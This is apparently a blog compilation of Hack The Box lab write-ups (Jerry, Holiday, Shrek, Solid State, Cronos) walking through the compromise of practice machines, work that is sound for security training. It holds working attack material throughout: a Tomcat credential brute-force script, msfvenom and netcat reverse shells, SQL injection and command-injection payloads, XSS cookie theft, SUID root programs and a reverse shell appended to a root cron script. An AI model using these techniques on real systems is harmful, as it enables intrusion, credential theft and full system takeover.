htb-jerry-nl

Today we are going to solve another CTF challenge “Jerry” which is available online for those who want to increase their skill in penetration testing. Jerry is retried vulnerable lab presented by Hack the Box.

Level: Easy

Task: find user.txt and root.txt file on victim’s machine.

Let’s begin with nmap port enumeration.

root@kali:~/htb/jerry# nmap -sV -sC -oA nmap 10.10.10.95
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-27 09:15 EDT
Nmap scan report for 10.10.10.95
Host is up (0.026s latency).
Not shown: 999 filtered ports
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.65 seconds

I then decided to access the Tomcat webpage at the URL: http://10.10.10.95:8080 From here, I decided to take to Google, to try and find documentation on the administration portal in Tomcat.

Picture

After Googling for some time, I learn that Tomcat does not call it’s Administrator’s admins, but instead  calls them managers. I also realize that I can access the portal through the link:http://10.10.10.95:8080/manager/html

Picture


Is it worth trying to login with default or common credentials, and @danielmiessler’s SecLists contains a comprehensive list of Tomcat credentials.
https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Default-Credentials /tomcat-betterdefaultpasslist.txt
As this list contains 79 credentials it is worth scripting some automation
The script “tomcat-brute.py”is used.
root@kali:~/htb/jerry# cat tomcat-brute.py 
# author: @egre55
# script to automate the testing of common apache tomcat credentials
#!/usr/bin/env python

import sys
import requests

with open('tomcat-betterdefaultpasslist.txt') as f:
for line in f:
c = line.strip('\n').split(":")
r = requests.get('http://10.10.10.95:8080/manager/html', auth=(c[0], c[1]))

sys.stdout.write("\033[K")
sys.stdout.write(line.strip('\n') + '\r')
sys.stdout.flush()

if r.status_code == 200:
print "Found valid credentials \"" + line.strip('\n') + "\""
raise sys.exit()
root@kali:~/htb/jerry# python tomcat-brute.py 
Found valid credentials "tomcat:s3cret"
Now  I can log into the manager’s portal and see the following screen.

Picture

I soon begin to realize that all of the file formats are in *.war and that I can only upload *.war file types. So after doing some research, I realize that I can create payloads using metasploit! I create a *.war payload using the command:
root@kali:~/htb/jerry# msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.20 LPORT=443 -f war > shell.war
Payload size: 1102 bytes
Final size of war file: 1102 bytes
Next, I extract the shell.war file so that I can examine the jsp_shell file name for future use:
root@kali:~/htb/jerry# jar -xvf shell.war
created: WEB-INF/
inflated: WEB-INF/web.xml
inflated: wxiucdkyhxeetnn.jsp
Picture
​I then uploaded the file and clicked to start the service. After, I start a netcat session by using the command: # nc -nvlp 443
to start listening for any services that want to connect, So I can gain a reverse shell.
I then go back to the website and type into the URL:
http://10.10.10.95:8080/shell/wxiucdkyhxeetnn.jsp
Please remember that the *.jsp file is the file name that was extracted earlier from the shell.war file.
c:\Users\jacco>nc -nvlp 443
listening on [any] 443 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.95] 49192
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\system

C:\apache-tomcat-7.0.88> cd C:\Users\Administrator\Desktop\flags

C:\Users\Administrator\Desktop\flags>type "2 for the price of 1.txt"
type "2 for the price of 1.txt"
user.txt
700*****d00

root.txt
04a*****90e
​Author : Puckiestyle

HTB – Holiday

Today we are going to solve another CTF challenge “Holiday” which is available online for those who want to increase their skill in penetration testing. Jerry is retried vulnerable lab presented by Hack the Box.

Level: Expert !!

Task: find user.txt and root.txt file on victim’s machine.

Let’s begin with nmap port enumeration.

nmap -A -p- 10.10.10.25 --open

As port 8000 is running http we open the IP address in the browser, and find a webpage.

We didn’t find anything on the webpage so we use dirb to enumerate the directories.

Dirb scan gives us a link to a directory called /login, we open the link and find a login page.

We capture the login request using burpsuite. We use random credentials as placeholder.

We use sqlmap to check if it is vulnerable to sql injection. After finding that it is vulnerable to sql injection, we use sqlmap to dump the database and find a username “RickA” and password hash.

c:\SQLMAP>sqlmap.py -r sql.txt --level 5 --risk 3 --batch --dbms=SQLite -T users --columns --dump  --threads 10 --batch
___
__H__
___ ___[,]_____ ___ ___ {1.2.11.19#dev}
|_ -| . [.] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V |_| http://sqlmap.org

[*] starting @ 12:41:27 /2018-11-29/

[12:41:27] [INFO] parsing HTTP request from 'sql.txt'
[12:41:28] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: username=admin") OR NOT 5230=5230 AND ("qZXC"="qZXC&password=admin
---
[12:41:28] [INFO] testing SQLite
[12:41:28] [INFO] confirming SQLite
[12:41:28] [INFO] actively fingerprinting SQLite
[12:41:28] [INFO] the back-end DBMS is SQLite
back-end DBMS: SQLite
[12:41:28] [INFO] resuming partial value: CREATE TABLE users (id INTEGER PRIMARY KEY AUTOINCREMENT,username TEXT,password TEXT
[12:41:28] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[12:41:28] [INFO] retrieved: ,active TINYINT(1))
Database: SQLite_masterdb
Table: users
[4 columns]
+----------+---------+
| Column | Type |
+----------+---------+
| active | TINYINT |
| id | INTEGER |
| password | TEXT |
| username | TEXT |
+----------+---------+
-snip-
Database: SQLite_masterdb
Table: users
[1 entry]
+----+--------+----------+----------------------------------+
| id | active | username | password |
+----+--------+----------+----------------------------------+
| 1 | 1 | RickA | fdc8cd4cff2c19e0d1022e78481ddf36 |
+----+--------+----------+----------------------------------+

[12:42:31] [INFO] table 'SQLite_masterdb.users' dumped to CSV file 'C:\Users\jacco\.sqlmap\output\10.10.10.25\dump\SQLite_masterdb\users.csv'

[*] ending @ 12:42:31 /2018-11-29/
c:\SQLMAP>

We use hashkiller.co.uk to decrypt the hash and find the password to the user. : nevergonnagiveyouup

We login using these credentials and we are redirected to a page with that looks like it contains user information.

We click on one of the UUID link and find a page that we can post notes for the users. It also shows that it will take up to 1 minute to post the note.

We try exploit the note function, and find it is vulnerable xss. As the notes are being read by administrator xss can be used to get the admin cookie. To run xss and run our payload we need to bypass the filter using java script function String.fromCharCode to run our payload. I created this script here to convert string to ascii code.

We post the note to bypass the filter we have to use this payload:

We setup our listener using nc on port 80, as we will receive the the response of the page including the administrator cookie on this port.

After waiting for 1 minute we received the admin cookie.

The cookie is url encoded we decode and use it hijack the administrator session.

We capture the webpage’s request using burpsuite. We change our cookie with that of administrator and forward it.

As soon as we forward the request, we are able to successfully hijack the administrator session.

We now go to /admin directory and find a page where there are options to export bookings and notes.

We capture the request using burpsuite, and check if it is vulnerable to any king of injection. After enumerating we find that this page is vulnerable to command injection.

We are unable to get a shell using web_delivery module of metaploit due to there being filters. Now we create a payload using msfvenom to upload into the target machine using command injection and get reverse shell.

After creating a shell, we create a python http server to upload into the target machine.

Now “.” Is not blacklisted so we convert the ipaddress into decimal number so that we can bypass the filter.

We upload the shell using wget command into the target machine and save it in /tmp directory.

As soon as we run the command we get a prompt that shell is uploaded.

We give our payload read, write and execute permission using command injection.

Now we setup our listener using metasploit.

We run the shell using command injection vulnerability on the target machine.

As soon as we run the shell we get a reverse shell.

We spawn a tty shell and take a look at the sudoers list and find that we can run /usr/bin/npm I * as root with no password.

Before trying to get root shell we first enumerate rest of the directories and find a file called “user.txt” in /home/algernon directory. We take a look at the content of the files and find the first flag.

Now we try to take root.txt we go to /app directory. We rename package.json to pack, and symlink /root/root.txt package.json

We run /usr/bin/npm i * as root user and find the final flag.

After searching through google we find a way to get reverse shell using a package called rimrafall.

We setup rimrafall by following the instructions given on the webpage.

We setup the json file and change the preinstalled script to bash one liner.

We run the command as root user to get privileged shell.

We setup the listener as soon as we run the preinstalled shell is getting executed we get a reverse shell.

We go to /root directory and find a file called root.txt. We take a look at the content of the file and find the final flag.

Author: Sayantan Bera

HTB – Shrek

Today we are going to solve another CTF challenge “Shrek” which is available online for those who want to increase their skill in penetration testing. Shrek is retried vulnerable lab presented by Hack the Box.

Level: Intermediate

Task: find user.txt and root.txt file on victim’s machine.

Let’s begin with nmap port enumeration.

c:\Users\jacco>nmap -sV 10.10.10.47
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-25 13:46 W. Europe Standard Time
Nmap scan report for 10.10.10.47
Host is up (0.028s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.5 (protocol 2.0)
80/tcp open http Apache httpd 2.4.27 ((Unix))
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.66 seconds

As we know from the nmap scan that the target machine is running HTTP on port 80, we open the Ip in our browser.

We don’t find anything on the home page, so we use dirb to enumerate the directories.

dirb http://10.10.10.47

dirb scan shows a directory called uploads. We open uploads/ directory and find a file called secret_ultimate.php.

Now we use wget to download the file into our system.

wget http://10.10.10.47/uploads/secret_ultimate.php

We open secret_ultimate.php and find a path to a directory called secret_area_51.

We open it in our browser and find an audio file in that directory.

We download into our system and use an online site called academo.org to analyse the spectrum, we find a hint to log in through FTP using username donkey.

Further analysis of the audio file gives us the password to the username.

We login through FTP using the credentials we find in the audio file. After logging in we find a few text files and a file simply called key.

We download the key and all the test files we use mget to mass-download the txt files.

On our system as we can see all the files have been downloaded.

We open the files one by one and in the highlighted file above we found a base64 encoded string that was differentiated by space.

UHJpbmNlQ2hhcm1pbmc=

We decode the first base64 encoded string using base64decode and find the decoded string to be ‘PrinceCharming’

In another file, we find a base64 encoded string similarly differentiated by space.

J1x4MDFceGQzXHhlMVx4ZjJceDE3VCBceGQwXHg4YVx4ZDZceGUyXHhiZFx4OWVceDllflAoXHhmN1x4ZTlceGE1XHhjMUtUXHg5YUlceGRkXFwhXHg5NXRceGUxXHhkNnBceGFhInUyXHhjMlx4ODVGXHgxZVx4YmNceDAwXHhiOVx4MTdceDk3XHhiOFx4MGJceGM1eVx4ZWM8Sy1ncDlceGEwXHhjYlx4YWNceDlldFx4ODl6XHgxM1x4MTVceDk0RG5ceGViXHg5NVx4MTlbXHg4MFx4ZjFceGE4LFx4ODJHYFx4ZWVceGU4Q1x4YzFceDE1XHhhMX5UXHgwN1x4Y2N7XHhiZFx4ZGFceGYwXHg5ZVx4MWJoXCdRVVx4ZTdceDE2M1x4ZDRGXHhjY1x4YzVceDk5dyc=

We decode the base64 encoded string and find a hexadecimal encoded string.

'\x01\xd3\xe1\xf2\x17T \xd0\x8a\xd6\xe2\xbd\x9e\x9e~P(\xf7\xe9\xa5\xc1KT\x9aI\xdd\\!\x95t\xe1\xd6p\xaa"u2\xc2\x85F\x1e\xbc\x00\xb9\x17\x97\xb8\x0b\xc5y\xec<K-gp9\xa0\xcb\xac\x9et\x89z\x13\x15\x94Dn\xeb\x95\x19[\x80\xf1\xa8,\x82G`\xee\xe8C\xc1\x15\xa1~T\x07\xcc{\xbd\xda\xf0\x9e\x1bh\'QU\xe7\x163\xd4F\xcc\xc5\x99w'

We use python to decode the hexadecimal string. We use secure module and use ‘PrinceCharming’ as key to decode the string and find the ssh username and passphrase for the key

root@kali:~# pip install secure
root@kali:~# python
Python 2.7.15+ (default, Aug 31 2018, 11:56:52) 
[GCC 8.2.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import seccure
>>> string ="hexadecimal string"
>>> print seccure.decrypt(string, "PrinceCharming")
The password for the ssh file is: shr3k1sb3st! and you have to ssh in as: sec

We open the key file and find that is a rsa key for ssh.

After setting the permissions of key to 600 we use this rsa key to log in . We use the username as sec as we found earlier and use the passphrase we found before to log in. As we log in we go to /home/sec directory, in that directory we find a file called user.txt. When we open the file we get our first flag.

Going through the directories we find a file called thoughts.txt

# sudo -l
# sudo -u farquad /usr/bin/vi
in vi -> :!/bin/bash
# find / -type f -newermt 2017-08-20 ! -newermt 2017-08-24 -ls 2>/dev/null

Privilege Escalation
Exploit:

https://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt The /usr/src​ folder is writeable for the sec ​user and contains a thoughts.txt​ file owned by root.
Attempting to create a file will reveal (after a bit of a delay) that there is a scheduled task which runs chown *​ in the directory. Using the above exploit, it is possible to force chown to use a reference file and apply the owner:group of that file to everything in the directory. The command
touch — –reference=thoughts.txt ​will create a file, with the name being passed as an argument to chown when it runs.
After that is configured, it is possible to create a binary and set its SUID bit. After the task runs and chowns the binary, it is possible to execute code as root.

Now to exploit the file we create a c program in our system that can give us the root.txt file in root directory. After creating the file we use SimpleHTTPServer module of python to transfer the file.

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
int main()
{
setuid(0);
system("cat /root/root.txt > /usr/puckieflag.txt" );
return 0;
}

We now download the file into the target system using wget.

wget http://10.10.14.19/puckie.c
[sec@shrek src]$ gcc puckie.c -o puckie
[sec@shrek src]$ chmod +s puckie
[root@shrek root]# cat chown
#!/usr/bin/python
from subprocess import run, PIPE, DEVNULL
find = run(["/usr/bin/find", "/usr/src", "-perm", "-4000"], stdout=PIPE, stderr=DEVNULL, encoding="utf-8").stdout.split('\n')[:-1]
chown = run(["cd /usr/src; /usr/bin/chown nobody:nobody *"], stderr=DEVNULL, shell=True)
for suid in find:
chmod = run(["/usr/bin/chmod", "+s", suid],stderr=DEVNULL)
[root@shrek root]#
As soon as it changes the user and group of the file we run it and find the final flag.
[sec@shrek src]$ ls -la
total 24
drwxr-xr-x 2 sec root 4096 Nov 28 19:42 .
drwxr-xr-x 8 sec root 4096 Nov 28 19:38 ..
-rwsr-sr-x 1 sec users 8496 Nov 28 19:42 puckie
-rw-r--r-- 1 sec users 0 Nov 28 19:28 '--reference=thoughts.txt'
-rw-r--r-- 1 root root 91 Aug 22 2017 thoughts.txt
[sec@shrek usr]$ cat /usr/puckieflag.txt 
54d....178

Extra notes:

vi setuid.c

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main( int argc, char *argv[] )
{
setreuid(0, 0);
execve("/bin/sh", NULL, NULL);
}

vi cut&paste above from clipboard
:set paste
dd
:wq!

Author: Jacco Straathof

HTB – Solid State

Today we are going to solve another CTF challenge “Solid State” which is available online for those who want to increase their skill in penetration testing. Solid State is retried vulnerable lab presented by Hack the Box.

Level: Medium

Task: find user.txt and root.txt file on victim’s machine.

Let’s begin with nmap port enumeration.

➜  ~ nmap --open -p- -R -T4 --max-retries 3 --min-rate 120 --max-rtt-timeout 300ms -Pn 10.10.10.51

Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-26 20:03 EST
Nmap scan report for 10.10.10.51
Host is up (0.12s latency).
Not shown: 61105 closed ports, 4424 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE
22/tcp   open  ssh
25/tcp   open  smtp
80/tcp   open  http
110/tcp  open  pop3
119/tcp  open  nntp
4555/tcp open  rsip

Taking the discovered ports, we’ll now run detailed scan. This will be much faster than scanning -p-.

c:\Users\jacco>nmap -A -p22,25,80,110,119,4555 --open -R -T4 --max-retries 3 --min-rate 120 --max-rtt-timeout 300ms -Pn 10.10.10.51
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-30 09:26 W. Europe Standard Time
Nmap scan report for 10.10.10.51
Host is up (0.030s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
| 2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
| 256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_ 256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp open smtp JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello nmap.scanme.org (10.10.14.15 [10.10.14.15]),
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Home - Solid State Security
110/tcp open pop3 JAMES pop3d 2.3.2
119/tcp open nntp JAMES nntpd (posting ok)
4555/tcp open james-admin JAMES Remote Admin 2.3.2
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.12 (95%), Linux 3.13 (95%), Linux 3.16 (95%), Linux 3.2 - 4.9 (95%), Linux 3.8 - 3.11 (95%), Linux 4.4 (95%), Linux 3.18 (95%), Linux 4.2 (95%), Linux 4.8 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 25.00 ms 10.10.14.1
2 33.00 ms 10.10.10.51

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.09 seconds

As always, we have a look at Apache first. I normally always use curl with a few pipes to pull data you think may be useful from the page, such as E-Mail addresses.

c:\Users\jacco>curl http://10.10.10.51 | findstr @
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 7776 100 7776 0 0 7776 0 0:00:01 --:--:-- 0:00:01 161k
<li class="fa-envelope"><a href="#">webadmin@solid-state-security.com</a></li>

Cool, so we did find an E-Mail, and our target is likely a mail server. Maybe we’ll need this later, maybe not, might as well save it.

A quick poke on exploit-db and you’ll find this PDF, which shows how you can achieve remote code execution on Apache JAMES by overwriting /etc/bash_completion.d by creating the user ../../../../../../../../etc/bash_completion.d in JAMES Remote Adminand then sending an E-Mail to them with a nested command in the body which will be executed when a user logs in next. However, we should put this in the back of our mind for now and first check if the default login for JAMES Remote Admin has been changed.

➜  ~ nc 10.10.10.51 4555
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
root
Password:
root
Welcome root. HELP for a list of commands

Great, so we have root access to JAMES Remote Admin, but what can we do with this?

HELP
listusers                               display existing accounts
adduser [username] [password]           add a new user
setpassword [username] [password]       sets a user's password
--trimmed due to size---

Let’s start by investigating the different mailboxes, we’ll change Mindy’s password so we can login to the JAMES pop3 server.

setpassword mindy password
Password for mindy reset

Now we can login to Mindy’s E-Mail, by initiating a telnet connection to port 110. You can also check out the other mailboxes afterwards.

➜  ~ telnet 10.10.10.51 110
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready 
USER mindy
+OK
PASS password
+OK Welcome mindy
LIST
+OK 2 1945
1 1109
2 836
.
RETR 2
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
          for <mindy@localhost>;
          Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access

Dear Mindy,


Here are your ssh credentials to access the system. Remember to reset your password after your first login. 
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path. 

username: mindy
pass: P@55W0rd1!2@

Respectfully,
James

.
QUIT
+OK Apache James POP3 Server signing off.
Connection closed by foreign host.

Here we go again, what is with people sending their SSH credentials?

Phase 2 – Exploitation

Let’s grab our user flag and check out how restricted this shell actually is!

PS C:\Users\jacco> ssh mindy@10.10.10.51
mindy@10.10.10.51's password:P@55W0rd1!2@ Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Tue Aug 22 14:00:02 2017 from 192.168.11.142 mindy@solidstate:~$ whoami -rbash: whoami: command not found mindy@solidstate:~$ ls bin user.txt mindy@solidstate:~$ cat user.txt 914*****d75 mindy@solidstate:~$ export -p declare -x DBUS_SESSION_BUS_ADDRESS="unix:path=/run/user/1001/bus" declare -x HOME="/home/mindy" declare -x LANG="en_US.UTF-8" declare -x LOGNAME="mindy" declare -x MAIL="/var/mail/mindy" declare -x OLDPWD declare -rx PATH="/home/mindy/bin" declare -x PWD="/home/mindy" declare -rx SHELL="/bin/rbash" declare -x SHLVL="1" declare -x SSH_CLIENT="10.10.14.15 19554 22" declare -x SSH_CONNECTION="10.10.14.15 19554 10.10.10.51 22" declare -x SSH_TTY="/dev/pts/0" declare -x TERM="xterm-256color" declare -x USER="mindy" declare -x XDG_RUNTIME_DIR="/run/user/1001" declare -x XDG_SESSION_ID="1128" mindy@solidstate:~$

So right off the bat we can see our path is /home/mindy/bin and we cannot write to this environmental variable to change our path. In addition commands including / will be ignored, so we cannot use the full path to a binary. Lastly we see we are locked into an rbash shell, which also, is not writable. This is where the exploit mentioned earlier comes into play, we now have a user to login with to trigger our exploit, so we just need to prep a bit.

.

Since we have enumerated the target network and found Apache James Serer 2.3.2 is running and after Browsing through the internet we stumbled across the Exploit DB module shown below, now copy the whole python code from here.

 

Paste above copied python code in a text file and make following changes inside payload as highlighted in below image and then save it, we have it as exploit.py on the desktop.

nc -e /bin/sh 10.10.14.3 8000

Now run above saved python file as I run using below command:

root@kali:/htb/solidstate# python 35513.py 10.10.10.51
[+]Connecting to James Remote Administration Tool...
[+]Creating user...
[+]Connecting to James SMTP server...
[+]Sending payload...
[+]Done! Payload will be executed once somebody logs in.

Ok Done! The Exploit will work only when someone logs in. So let’s again login into SSH shell using the user Mindy’s Credentials and as soon as we login the exploit begin to work as shown below.

Let’s open a netcat Listener to get the shell which will be generated after our exploit gets completely executed. Now we need to import the python file to reach the terminal and to do so type:

python -c "import pty; pty.spawn('/bin/bash')"

Now let move towards 2nd challenge for root.txt and currently we are in Mindy directory. For root.txt file we need to move into root but I have no idea for further step. Then I recall Mindy has received a mail from admin account send by James, there are chance of getting any hint from James therefore I prefer to grep running process of James by executing following command.

ps aux | grep james

Here aux will work as describe below:

= display processes for all users
u = show the process’s user/owner
x = show processes not attached to a terminal

Great!! It has shown root process for opt file.

Then I move into /opt directory and run ls-al command for exploring all files and folder inside this directory.

Lastly, we setup a listener, when the user mindy logs into ssh it will execute the reverse shell. Below you can see the output from SSH as it loses all its shit.

➜  ~ ssh mindy@10.10.10.51
mindy@10.10.10.51's password: 
Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Jan 26 23:20:16 2018 from 10.10.15.82
-rbash: $'\254\355\005sr\036org.apache.james.core.MailImpl\304x\r\345\274\317ݬ\003': command not found
-rbash: L: command not found
--trimmed due to size---

Note: if another user beat you to this exploit you can actually bypass rbash all together by pressing CTRL+C a few times, making this whole process way quicker.

And here’s our reverse shell!

➜  ~ nc -vlnp 8000
listening on [any] 8000 ...
connect to [10.10.15.82] from (UNKNOWN) [10.10.10.51] 56316
id
uid=1001(mindy) gid=1001(mindy) groups=1001(mindy)
python -c 'import pty;pty.spawn("/bin/bash");'
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ 

Moving on let’s see what we can figure out about the system. By grepping ps for Jameswe find it’s running a bash script and jvm from the /opt directory. These are things we should investigate, however, poking around at them I wasn’t able to find anything interesting.

${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ ps aux | grep james
root       352  0.0  0.1   2332   516 ?        Ss   20:08   0:00 /bin/sh /opt/james-2.3.2/bin/run.sh
root       383  0.3  7.4 445428 37816 ?        Sl   20:08   0:11 /usr/lib/jvm/java-8-openjdk-i386//bin/java -Djava.ext.dirs=/opt/james-2.3.2/lib:/opt/james-2.3.2/tools/lib -Djava.security.manager -Djava.security.policy=jar:file:/opt/james-2.3.2/bin/phoenix-loader.jar!/META-INF/java.policy -Dnetworkaddress.cache.ttl=300 -Dphoenix.home=/opt/james-2.3.2 -Djava.io.tmpdir=/opt/james-2.3.2/temp -jar /opt/james-2.3.2/bin/phoenix-loader.jar

Next let’s have a look for some system crons. We find some, however, it’s doing nothing interesting. Let’s check out the /opt directory James is running from.

${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ cd /opt
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ ls -la
total 16
drwxr-xr-x  3 root root 4096 Aug 22 13:32 .
drwxr-xr-x 22 root root 4096 Jun 18  2017 ..
drwxr-xr-x 11 root root 4096 Aug 22 12:01 james-2.3.2
-rwxrwxrwx  1 root root  105 Aug 22 13:32 tmp.py

Interesting a root owned, writable python script.

${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ cat tmp.py
#!/usr/bin/env python
import os
import sys
try:
     os.system('rm -r /tmp/* ')
except:
     sys.exit()

So we didn’t find any cron for this script, but we can test whether this script is being run, and even time the interval between execution.

${debian_chroot:+($debian_chroot)}mindy@solidstate:/tmp$ touch test
${debian_chroot:+($debian_chroot)}mindy@solidstate:/tmp$ ls -l
total 0
-rw-rw---- 1 mindy mindy 0 Jan 26 21:13 test
---some time passes---
${debian_chroot:+($debian_chroot)}mindy@solidstate:/tmp$ ls

Great, so the files in /tmp are being deleted. Let’s add a little bit of code to execute at the end of tmp.py

Phase 3 – Privilege Escalation

mindy@solidstate:/tmp$ cd /opt
mindy@solidstate:/opt$ echo "os.system('/bin/nc -e /bin/bash 10.10.15.82 8001')" >> tmp.py
mindy@solidstate:/opt$ cat tmp.py
#!/usr/bin/env python
import os
import sys
try:
     os.system('rm -r /tmp/* ')
except:
     sys.exit()

os.system('/bin/nc -e /bin/bash 10.10.15.82 8001')

Now, we wait for our shell.

➜  ~ nc -vlnp 8001 
listening on [any] 8001 ...
connect to [10.10.15.82] from (UNKNOWN) [10.10.10.51] 45182
id
uid=0(root) gid=0(root) groups=0(root)  <-- bask in the glory of shell!
cd /root
ls
root.txt
cat root.txt
b4c....7c9

Let’s also see what the cron was that ran this with our fancy new root privileges.

crontab -l
---trimmed due to size---
*/3 * * * * python /opt/tmp.py

Author: Jacco Straathof

HTB – Cronos

Today we are going to solve another CTF challenge “Cronos” which is available online for those who want to increase their skill in penetration testing. Cronos is retried vulnerable lab presented by Hack the Box.

Level: Intermediate

Task: find user.txt and root.txt file on victim’s machine.

Let’s begin with nmap port enumeration.

$ nmap -T4 -A -sV 10.10.10.13

Starting Nmap 7.50 ( https://nmap.org ) at 2018-11-27 14:50 IST
Nmap scan report for 10.10.10.13
Host is up (0.21s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
| 2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
| 256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_ 256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (EdDSA)
53/tcp open domain ISC BIND 9.10.3-P4-Ubuntu
| dns-nsid: 
|_ bind.version: 9.10.3-P4-Ubuntu
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.17 seconds

It has DNS server
Add cronos.htb on /etc/hosts
Dig

root@kali:/htb/cronos# dig axfr @10.10.10.13 cronos.htb

; <<>> DiG 9.11.5-1-Debian <<>> axfr @10.10.10.13 cronos.htb
; (1 server found)
;; global options: +cmd
cronos.htb.		604800	IN	SOA	cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb.		604800	IN	NS	ns1.cronos.htb.
cronos.htb.		604800	IN	A	10.10.10.13
admin.cronos.htb.	604800	IN	A	10.10.10.13
ns1.cronos.htb.		604800	IN	A	10.10.10.13
www.cronos.htb.		604800	IN	A	10.10.10.13
cronos.htb.		604800	IN	SOA	cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 33 msec
;; SERVER: 10.10.10.13#53(10.10.10.13)
;; WHEN: Tue Nov 27 14:41:37 EST 2018
;; XFR size: 7 records (messages 1, bytes 203)

Visit http://admin.cronos.htb.

There’s a SQLi in the username field. Enter admin’– – in username field. (or enter ‘ or 1=1#  in username field.)
The input field in welcome.php is vulnerable to command injection.

Create php-reverse-shell payload and upload it to the server.
http://pentestmonkey.net/tools/web-shells/php-reverse-shell

root@kali:/htb/cronos# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.13 - - [27/Nov/2018 12:57:29] "GET /r2.txt HTTP/1.1" 200 -
In the input field of welcome.php enter :
8.8.8.8; pwd
8.8.8.8; wget 10.10.15.16/r2.txt -P /var/www/admin/
8.8.8.8; cp r2.txt puckie.php

In the input field of welcome.php enter :
8.8.8.8; pwd
8.8.8.8; wget 10.10.15.16/r2.txt -P /var/www/admin/ 
8.8.8.8; cp r2.txt puckie.php

